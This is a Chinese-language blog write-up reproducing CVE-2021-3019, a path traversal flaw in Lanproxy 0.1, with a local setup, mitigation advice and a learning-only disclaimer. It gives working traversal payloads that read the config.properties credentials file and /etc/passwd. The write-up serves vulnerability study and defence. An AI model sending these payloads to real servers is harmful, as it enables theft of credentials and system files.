Lanproxy任意文件读取漏洞(CVE-2021-3019)漏洞利用

本文由粉丝:判官蜘蛛投稿

漏洞概述:

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

 

影响版本:

lanproxy 0.1

 

环境搭建:

1.下载proxy-server-0.1.zip

下载地址:https://file.nioee.com/d/2e81550ebdbd416c933f/

2. 解压安装之后移动文件

mv proxy-server-0.1 /usr/local/

直接启动服务

cd /usr/local/proxy-server-0.1/binchmod +x startup.sh./startup.sh

3. 访问 :8090 登录界面窗口

4.漏洞利用

Poc/../conf/config.properties

5.读取passwd

/../../../../../../../../../etc/passwd

成功读取

 

6、修复建议

lanproxy尚未针对该漏洞发布安全更新

建议禁止将lanproxy管理面板对外部开放

结束语:

本次复现是本地搭建模拟攻击行为,本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

【来稿说明】:

本宗旨是一个公益性的平台,属于大家锻炼的平台,不能只展示我个人的,所以欢迎有才华的人士来稿。大家写文档投稿,也需要占用一定的个人时间,且现在的生活节奏较快,能乐于分享,牺牲自己的宝贵时间,真的很难得。所以,小编决定根据个人经济情况及投稿文章质量,每次投稿,打赏的稿费定在5元-50元之间,请有兴趣者,不要介意钱太少,或者后续也可以采用赠送书籍的形式。

来稿邮箱:@.com

来稿声明:须自己本人原创,否则后果自行承担。未在其他平台发布过。

END

猜您喜欢往期精选▼

SQL注入详解,看这篇就够了

“来骗、来偷袭”攻击我这脆弱的“老”系统,不讲“武”德!

综合开源靶场搭建

SQL注入及如何解决

安全应急之常见命令篇(Linux&Windows)

更多精选资源尽在星球,欢迎加入交流